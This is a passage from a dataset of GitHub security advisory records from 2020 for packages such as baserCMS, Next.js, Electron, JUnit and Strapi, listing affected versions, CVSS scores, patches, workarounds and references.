'http://www.openwall.com/lists/oss-security/2020/09/30/3'}]","{'cwe_ids': ['CWE-522'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-10-08T22:11:09Z', 'nvd_published_at': None}"
+1.4.0,GHSA-6fmv-q269-55cw,2021-01-08T21:18:07Z,2020-10-30T17:05:59Z,,['CVE-2020-15277'],"Edit template, Remote Code Execution (RCE) Vulnerability in Latest Release 4.4.0","baserCMS 4.4.0 and earlier is affected by Remote Code Execution (RCE).
+
+Impact: XSS via Arbitrary script execution.
+Attack vector is: Administrator must be logged in.
+Components are: Edit template.
+Tested baserCMS Version : 4.4.0 (Latest)
+Affected baserCMS Version : 4.0.0 ~ 4.4.0
+Patches : https://basercms.net/security/20201029
+Found by Aquilao Null","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'baserproject/basercms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.4.0'}, {'fixed': '4.4.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/baserproject/basercms/security/advisories/GHSA-6fmv-q269-55cw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15277'}, {'type': 'WEB', 'url': 'https://github.com/baserproject/basercms/commit/bb027c3967b0430adcff2d2fedbc23d39077563b'}, {'type': 'WEB', 'url': 'https://basercms.net/security/20201029'}]","{'cwe_ids': ['CWE-434', 'CWE-74'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-10-30T16:54:46Z', 'nvd_published_at': None}"
+1.4.0,GHSA-8hxh-r6f7-jf45,2021-10-04T21:26:20Z,2020-10-16T17:03:43Z,,[],Memory exhaustion in http4s-async-http-client with large or malicious compressed responses,"### Impact
+A server we connect to with http4s-async-http-client could theoretically respond with a large or malicious compressed stream and exhaust memory in the client JVM. It does not affect http4s servers, other client backends, or clients that speak only to trusted servers. This is related to a transitive dependency on netty-codec-4.1.45.Final, which is affected by [CVE-2020-11612](https://app.snyk.io/vuln/SNYK-JAVA-IONETTY-564897).
+
+### Patches
+Upgrade to http4s-async-http-client >= 0.21.8. All 1.0 milestones are also safe.
+
+### Workarounds
+Add an explicit runtime dependency on async-http-client's netty dependencies that evicts them to an unaffected version:
+
+```scala
+libraryDependencies ++= Seq(
+ ""io.netty"" % ""netty-codec"" % ""4.1.53.Final"" % Runtime,
+ ""io.netty"" % ""netty-codec-socks"" % ""4.1.53.Final"" % Runtime,
+ ""io.netty"" % ""netty-handler-proxy"" % ""4.1.53.Final"" % Runtime,
+ ""io.netty"" % ""netty-common"" % ""4.1.53.Final"" % Runtime,
+ ""io.netty"" % ""netty-transport"" % ""4.1.53.Final"" % Runtime,
+ ""io.netty"" % ""netty-handler"" % ""4.1.53.Final"" % Runtime,
+ ""io.netty"" % ""netty-resolver-dns"" % ""4.1.53.Final"" % Runtime
+)
+```
+
+### References
+* https://app.snyk.io/vuln/SNYK-JAVA-IONETTY-564897
+* https://github.com/http4s/http4s/issues/3681
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [http4s](https://github.com/http4s/http4s/issues/new)
+* Contact a maintainer privately per [http4s' security policy](https://github.com/http4s/http4s/blob/master/SECURITY.md#reporting-a-vulnerability)",[],"[{'package': {'ecosystem': 'Maven', 'name': 'org.http4s:http4s-async-http-client_2.13'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.21.8'}]}], 'database_specific': {'last_known_affected_version_range': '<= 0.21.7'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.http4s:http4s-async-http-client_2.12'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.21.8'}]}], 'database_specific': {'last_known_affected_version_range': '<= 0.21.7'}}]","[{'type': 'WEB', 'url': 'https://github.com/http4s/http4s/security/advisories/GHSA-8hxh-r6f7-jf45'}, {'type': 'PACKAGE', 'url': 'https://github.com/http4s/http4s'}]","{'cwe_ids': ['CWE-400'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-10-16T17:03:18Z', 'nvd_published_at': None}"
+1.4.0,GHSA-fw5q-j9p4-3vxg,2021-01-07T22:49:33Z,2020-10-30T19:10:20Z,,['CVE-2020-15276'],"Blog comment posting, Cross Site Scripting(XSS) Vulnerability in Latest Release 4.4.0","baserCMS 4.4.0 and earlier is affected by Cross Site Scripting (XSS).
+
+Impact: XSS via Arbitrary script execution.
+Components are: Blog comment posting
+Tested baserCMS Version : 4.4.0 (Latest)
+Affected baserCMS Version : 4.0.0 ~ 4.4.0
+Patches : https://basercms.net/security/20201029
+Found by yama","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'baserproject/basercms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.4.0'}, {'fixed': '4.4.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/baserproject/basercms/security/advisories/GHSA-fw5q-j9p4-3vxg'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15276'}, {'type': 'WEB', 'url': 'https://github.com/baserproject/basercms/commit/d14f506385f21d67d5ff3462f204d4c2321b7c54'}, {'type': 'WEB', 'url': 'https://basercms.net/security/20201029'}]","{'cwe_ids': ['CWE-79'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-10-30T18:54:55Z', 'nvd_published_at': None}"
+1.4.0,GHSA-2xwp-m7mq-7q3r,2020-10-28T17:04:54Z,2020-10-28T17:05:38Z,,[],CLI does not correctly implement strict mode,"In the affected versions, the AWS Encryption CLI operated in ""discovery mode"" even when ""strict mode"" was specified. Although decryption only succeeded if the user had permission to decrypt with at least one of the CMKs, decryption could be successful using a CMK that was not included in the user-defined set when the CLI was operating in ""strict mode.""
+
+Affected users should upgrade to Encryption CLI v1.8.x or v2.1.x as soon as possible.",[],"[{'package': {'ecosystem': 'PyPI', 'name': 'aws-encryption-sdk-cli'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.8.0'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'aws-encryption-sdk-cli'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.1.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/aws/aws-encryption-sdk-cli/security/advisories/GHSA-2xwp-m7mq-7q3r'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-encryption-sdk-cli/commit/7d21b8051cab9e52e056fe427d2bff19cf146460'}]","{'cwe_ids': ['CWE-326'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-10-28T17:04:54Z', 'nvd_published_at': None}"
+1.4.0,GHSA-55w9-c3g2-4rrh,2020-10-07T17:50:33Z,2020-10-07T17:51:02Z,,['CVE-2012-5784'],Man-in-the-middle attack in Apache Axis,"Apache Axis 1.4 and earlier, as used in PayPal Payments Pro, PayPal Mass Pay, PayPal Transactional Information SOAP, the Java Message Service implementation in Apache ActiveMQ, and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.",[],"[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.axis:axis'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.4'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'axis:axis'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2012-5784'}, {'type': 'WEB', 'url': 'https://exchange.xforce.ibmcloud.com/vulnerabilities/79829'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/44d4e88a5fa8ae60deb752029afe9054da87c5f859caf296fcf585e5@%3Cjava-dev.axis.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/5e6c92145deddcecf70c3604041dcbd615efa2d37632fc2b9c367780@%3Cjava-dev.axis.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/8aa25c99eeb0693fc229ec87d1423b5ed5d58558618706d8aba1d832@%3Cjava-dev.axis.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/a308887782e05da7cf692e4851ae2bd429a038570cbf594e6631cc8d@%3Cjava-dev.axis.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/de2af12dcaba653d02b03235327ca4aa930401813a3cced8e151d29c@%3Cjava-dev.axis.apache.org%3E'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00007.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00022.html'}, {'type': 'WEB', 'url': 'http://rhn.redhat.com/errata/RHSA-2013-0269.html'}, {'type': 'WEB', 'url': 'http://rhn.redhat.com/errata/RHSA-2013-0683.html'}, {'type': 'WEB', 'url': 'http://rhn.redhat.com/errata/RHSA-2014-0037.html'}, {'type': 'WEB', 'url': 'http://secunia.com/advisories/51219'}, {'type': 'WEB', 'url': 'http://www.cs.utexas.edu/~shmat/shmat_ccs12.pdf'}, {'type': 'WEB', 'url': 'http://www.securityfocus.com/bid/56408'}]","{'cwe_ids': ['CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-10-07T17:50:33Z', 'nvd_published_at': None}"
+1.4.0,GHSA-x56p-c8cg-q435,2021-10-06T21:27:19Z,2020-10-08T19:28:07Z,,['CVE-2020-15242'],Open Redirect in Next.js versions,"### Impact
+
+- **Affected**: Users of Next.js between 9.5.0 and 9.5.3
+- **Not affected**: Deployments on Vercel ([https://vercel.com](https://vercel.com)) are not affected
+- **Not affected**: Deployments using `next export`
+
+We recommend everyone to upgrade regardless of whether you can reproduce the issue or not.
+
+### Patches
+
+https://github.com/vercel/next.js/releases/tag/v9.5.4
+
+### References
+
+https://github.com/vercel/next.js/releases/tag/v9.5.4
+
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'next'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.5.0'}, {'fixed': '9.5.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vercel/next.js/security/advisories/GHSA-x56p-c8cg-q435'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15242'}, {'type': 'PACKAGE', 'url': 'https://github.com/vercel/next.js'}, {'type': 'WEB', 'url': 'https://github.com/zeit/next.js/releases/tag/v9.5.4'}]","{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-10-08T19:27:38Z', 'nvd_published_at': None}"
+1.4.0,GHSA-jrgf-vfw2-hj26,2021-11-19T13:46:38Z,2020-10-30T17:06:06Z,,['CVE-2020-15244'],RCE via PHP Object injection via SOAP Requests,"### Impact
+This vulnerability allows an admin user to generate soap credentials that can be used to trigger RCE via PHP Object Injection through product attributes and a product.
+
+### Patches
+The latest OpenMage Versions up from 19.4.7 and 20.0.3 have this Issue solved
+
+### Credits
+Credit to Luke Rodgers for reporting","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'openmage/magento-lts'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '19.4.8'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'openmage/magento-lts'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '20.0.0'}, {'fixed': '20.0.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/OpenMage/magento-lts/security/advisories/GHSA-jrgf-vfw2-hj26'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15244'}, {'type': 'WEB', 'url': 'https://github.com/OpenMage/magento-lts/commit/26433d15b57978fcb7701b5f99efe8332ca8630b'}, {'type': 'PACKAGE', 'url': 'https://github.com/OpenMage/magento-lts'}]","{'cwe_ids': ['CWE-502', 'CWE-74'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-10-30T16:25:06Z', 'nvd_published_at': '2020-10-21T20:15:00Z'}"
+1.4.0,GHSA-c27r-x354-4m68,2022-08-02T20:03:05Z,2020-10-27T20:39:46Z,,[],xml-crypto's HMAC-SHA1 signatures can bypass validation via key confusion,"### Impact
+An attacker can inject an HMAC-SHA1 signature that is valid using only knowledge of the RSA public key. This allows bypassing signature validation.
+
+### Patches
+Version 2.0.0 has the fix.
+
+### Workarounds
+The recommendation is to upgrade. In case that is not possible remove the 'http://www.w3.org/2000/09/xmldsig#hmac-sha1' entry from SignedXml.SignatureAlgorithms.",[],"[{'package': {'ecosystem': 'npm', 'name': 'xml-crypto'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.5.3'}}]","[{'type': 'WEB', 'url': 'https://github.com/yaronn/xml-crypto/security/advisories/GHSA-c27r-x354-4m68'}, {'type': 'WEB', 'url': 'https://github.com/yaronn/xml-crypto/commit/3d9db712e6232c765cd2ad6bd2902b88a0d22100'}, {'type': 'PACKAGE', 'url': 'https://github.com/yaronn/xml-crypto'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/xml-crypto'}]","{'cwe_ids': ['CWE-287'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-10-27T20:35:52Z', 'nvd_published_at': None}"
+1.4.0,GHSA-f366-4rvv-95x2,2021-10-04T21:23:53Z,2020-10-02T16:33:19Z,,[],Buffer overflow in deprecated USB HALs and stack overflow in USB enumeration,"### Impact
+1) If an application is making use of the deprecated kit protocol HALs as the communication channel to the target device an attacker can masquerade as a device and return malformed packets of arbitrary length which the protocol stack will write to the stack. HALs intended for production use are unaffected (I2C, SWI, & SPI) as well as the hidapi HAL (hal_all_platforms_kit_hidapi.c).
+
+2) The hidapi HAL can be made to overrun the application stack by attaching more than 10 (real or virtual) devices likely resulting in an application crash as this does not allow arbitrary data to be written to the stack.
+
+### Patches
+USB kit enumeration has been patched in v3.2.3 for the hidapi HAL (hal_all_platforms_kit_hidapi.c).
+
+### Removal of deprecated HALs
+Deprecated usb kit HALs have been removed in v3.2.3.
+
+### Workarounds
+This vulnerability is limited to users of the kit protocol which is used with Microchip kits and kit firmware to bridge communication from USB-HID to I2C or SWI. It is not expected that kits would be used in an production environment. This is an optional component for users as well so they can always compile the library without the usb support option.
+
+### Special python packaging notes
+The python package for cryptoauthlib uses date codes for identifying versions. The patched version for python packages is 20200912
+
+### References
+Please see [Microchip PSIRT](https://www.microchip.com/design-centers/embedded-security/how-to-report-potential-product-security-vulnerabilities) for Microchip's security policy and reporting procedures
+
+### Credits
+Special thanks to Ruben Santamarta of [IOActive](https://blogs.ioactive.com/) for reporting",[],"[{'package': {'ecosystem': 'PyPI', 'name': 'cryptoauthlib'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '20200912'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/MicrochipTech/cryptoauthlib/security/advisories/GHSA-f366-4rvv-95x2'}, {'type': 'PACKAGE', 'url': 'https://github.com/MicrochipTech/cryptoauthlib'}]","{'cwe_ids': ['CWE-120'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-10-02T16:27:28Z', 'nvd_published_at': None}"
+1.4.0,GHSA-2q4g-w47c-4674,2021-11-19T14:44:04Z,2020-10-06T14:24:04Z,,['CVE-2020-15174'],Unpreventable top-level navigation,"### Impact
+The `will-navigate` event that apps use to prevent navigations to unexpected destinations [as per our security recommendations](https://www.electronjs.org/docs/tutorial/security) can be bypassed when a sub-frame performs a top-frame navigation across sites.
+
+### Patches
+
+* `11.0.0-beta.1`
+* `10.0.1`
+* `9.3.0`
+* `8.5.1`
+
+### Workarounds
+Sandbox all your iframes using the [`sandbox` attribute](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/iframe#attr-sandbox). This will prevent them creating top-frame navigations and is good practice anyway.
+
+### For more information
+If you have any questions or comments about this advisory:
+
+* Email us at security@electronjs.org","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'electron'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0-beta.0'}, {'fixed': '8.5.1'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'electron'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0-beta.0'}, {'fixed': '9.3.0'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'electron'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0-beta.0'}, {'fixed': '10.0.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/electron/electron/security/advisories/GHSA-2q4g-w47c-4674'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15174'}, {'type': 'WEB', 'url': 'https://github.com/electron/electron/commit/18613925610ba319da7f497b6deed85ad712c59b'}, {'type': 'PACKAGE', 'url': 'https://github.com/electron/electron'}]","{'cwe_ids': ['CWE-20', 'CWE-693'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-10-06T14:12:16Z', 'nvd_published_at': '2020-10-06T18:15:00Z'}"
+1.4.0,GHSA-269g-pwp5-87pp,2021-10-05T16:04:16Z,2020-10-12T17:33:00Z,,['CVE-2020-15250'],TemporaryFolder on unix-like systems does not limit access to created files,"### Vulnerability
+
+The JUnit4 test rule [TemporaryFolder](https://junit.org/junit4/javadoc/4.13/org/junit/rules/TemporaryFolder.html) contains a local information disclosure vulnerability.
+
+Example of vulnerable code:
+```java
+public static class HasTempFolder {
+ @Rule
+ public TemporaryFolder folder = new TemporaryFolder();
+
+ @Test
+ public void testUsingTempFolder() throws IOException {
+ folder.getRoot(); // Previous file permissions: `drwxr-xr-x`; After fix:`drwx------`
+ File createdFile= folder.newFile(""myfile.txt""); // unchanged/irrelevant file permissions
+ File createdFolder= folder.newFolder(""subfolder""); // unchanged/irrelevant file permissions
+ // ...
+ }
+}
+```
+
+### Impact
+
+On Unix like systems, the system's temporary directory is shared between all users on that system. Because of this, when files and directories are written into this directory they are, by default, readable by other users on that same system.
+
+This vulnerability **does not** allow other users to overwrite the contents of these directories or files. This is purely an information disclosure vulnerability.
+
+When analyzing the impact of this vulnerability, here are the important questions to ask:
+
+1. Do the JUnit tests write sensitive information, like API keys or passwords, into the temporary folder?
+ - If yes, this vulnerability impacts you, but only if you also answer 'yes' to question 2.
+ - If no, this vulnerability does not impact you.
+2. Do the JUnit tests ever execute in an environment where the OS has other untrusted users.
+ _This may apply in CI/CD environments but normally won't be 'yes' for personal developer machines._
+ - If yes, and you answered 'yes' to question 1, this vulnerability impacts you.
+ - If no, this vulnerability does not impact you.
+
+### Patches
+
+Because certain JDK file system APIs were only added in JDK 1.7, this this fix is dependent upon the version of the JDK you are using.
+ - Java 1.7 and higher users: this vulnerability is fixed in 4.13.1.
+ - Java 1.6 and lower users: **no patch is available, you must use the workaround below.**
+
+### Workarounds
+
+If you are unable to patch, or are stuck running on Java 1.6, specifying the `java.io.tmpdir` system environment variable to a directory that is exclusively owned by the executing user will fix this vulnerability.
+
+### References
+- [CWE-200: Exposure of Sensitive Information to an Unauthorized Actor](https://cwe.mitre.org/data/definitions/200.html)
+- Fix commit https://github.com/junit-team/junit4/commit/610155b8c22138329f0723eec22521627dbc52ae
+
+#### Similar Vulnerabilities
+ - Google Guava - https://github.com/google/guava/issues/4011
+ - Apache Ant - https://nvd.nist.gov/vuln/detail/CVE-2020-1945
+ - JetBrains Kotlin Compiler - https://nvd.nist.gov/vuln/detail/CVE-2020-15824
+
+### For more information
+If you have any questions or comments about this advisory, please pen an issue in [junit-team/junit4](https://github.com/junit-team/junit4/issues).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'junit:junit'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.7'}, {'fixed': '4.13.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/junit-team/junit4/security/advisories/GHSA-269g-pwp5-87pp'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15250'}, {'type': 'WEB', 'url': 'https://github.com/junit-team/junit4/issues/1676'}, {'type': 'WEB', 'url': 'https://github.com/junit-team/junit4/commit/610155b8c22138329f0723eec22521627dbc52ae'}, {'type': 'PACKAGE', 'url': 'https://github.com/junit-team/junit4'}, {'type': 'WEB', 'url': 'https://github.com/junit-team/junit4/blob/7852b90cfe1cea1e0cdaa19d490c83f0d8684b50/doc/ReleaseNotes4.13.1.md'}, {'type': 'WEB', 'url': 'https://junit.org/junit4/javadoc/4.13/org/junit/rules/TemporaryFolder.html'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r01110833b63616ddbef59ae4e10c0fbd0060f0a51206defd4cb4d917@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r09cfbb5aedd76023691bbce9ca4ce2e16bb07dd37554a17efc19935d@%3Cpluto-dev.portals.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1209986f79359b518d09513ff05a88e5b3c398540e775edea76a4774@%3Cdev.knox.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r29d703d1986d9b871466ff24082a1828ac8ad27bb0965a93a383872e@%3Cpluto-scm.portals.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2b78f23bc2711a76a7fc73ad67b7fcd6817c5cfccefd6f30a4f54943@%3Cdev.knox.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r30f502d2f79e8d635361adb8108dcbb73095163fcbd776ee7984a094@%3Ccommits.creadur.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r500517c23200fb2fdb0b82770a62dd6c88b3521cfb01cfd0c76e3f8b@%3Cdev.creadur.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5f8841507576f595bb783ccec6a7cb285ea90d4e6f5043eae0e61a41@%3Cdev.creadur.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r687f489b10b0d14e46f626aa88476545e1a2600b24c4ebd3c0d2a10b@%3Cdev.knox.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r717877028482c55acf604d7a0106af4ca05da4208c708fb157b53672@%3Ccommits.creadur.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r742b44fd75215fc75963b8ecc22b2e4372e68d67d3d859d2b5e8743f@%3Cdev.knox.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8b02dc6f18df11ff39eedb3038f1e31e6f90a779b1959bae65107279@%3Cdev.knox.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r925eaae7dd8f77dd61eefc49c1fcf54bd9ecfe605486870d7b1e9390@%3Cpluto-dev.portals.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r934208a520b38f5cf0cae199b6b076bfe7d081809528b0eff2459e40@%3Cdev.knox.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r95f8ef60c4b3a5284b647bb3132cda08e6fadad888a66b84f49da0b0@%3Ccommits.creadur.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9710067c7096b83cb6ae8f53a2f6f94e9c042d1bf1d6929f8f2a2b7a@%3Ccommits.knox.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra1bdb9efae84794e8ffa2f8474be8290ba57830eefe9714b95da714b@%3Cdev.pdfbox.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/raebf13f53cd5d23d990712e3d11c80da9a7bae94a6284050f148ed99@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb2771949c676ca984e58a5cd5ca79c2634dee1945e0406e48e0f8457@%3Cdev.creadur.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb2ffe2993f4dccc48d832e1a0f1c419477781b6ea16e725ca2276dbb@%3Cdev.knox.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb33212dab7beccaf1ffef9b88610047c644f644c7a0ebdc44d77e381@%3Ccommits.turbine.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbaec90e699bc7c7bd9a053f76707a36fda48b6d558f31dc79147dbf9@%3Cdev.creadur.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc49cf1547ef6cac1be4b3c92339b2cae0acacf5acaba13cfa429a872@%3Cdev.creadur.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rdbdd30510a7c4d0908fd22075c02b75bbc2e0d977ec22249ef3133cb@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rde385b8b53ed046600ef68dd6b4528dea7566aaddb02c3e702cc28bc@%3Ccommits.creadur.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rde8e70b95c992378e8570e4df400c6008a9839eabdfb8f800a3e5af6@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rdef7d1380c86e7c0edf8a0f89a2a8db86fce5e363457d56b722691b4@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rea812d8612fdc46842a2a57248cad4b01ddfdb1e9b037c49e68fdbfb@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/reb700e60b9642eafa4b7922bfee80796394135aa09c7a239ef9f7486@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf2ec93f4ca9a97d1958eb4a31b1830f723419ce9bf2018a6e5741d5b@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf6e5d894d4b03bef537c9d6641272e0197c047c0d1982b4e176d0353@%3Cdev.knox.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf797d119cc3f51a8d7c3c5cbe50cb4524c8487282b986edde83a9467@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/11/msg00003.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}]","{'cwe_ids': ['CWE-200', 'CWE-732'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-10-12T17:32:34Z', 'nvd_published_at': '2020-10-12T18:15:00Z'}"
+1.4.0,GHSA-qvp5-mm7v-4f36,2023-09-13T22:53:33Z,2020-10-29T19:40:08Z,,['CVE-2020-27666'],Cross-site Scripting in Strapi,Strapi before 3.2.5 has stored XSS in the wysiwyg editor's preview feature.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'strapi-plugin-content-manager'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.2.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-27666'}, {'type': 'WEB', 'url': 'https://github.com/strapi/strapi/pull/8440'}, {'type': 'WEB', 'url': 'https://github.com/strapi/strapi/releases/tag/v3.2.5'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-10-29T19:38:18Z', 'nvd_published_at': None}"
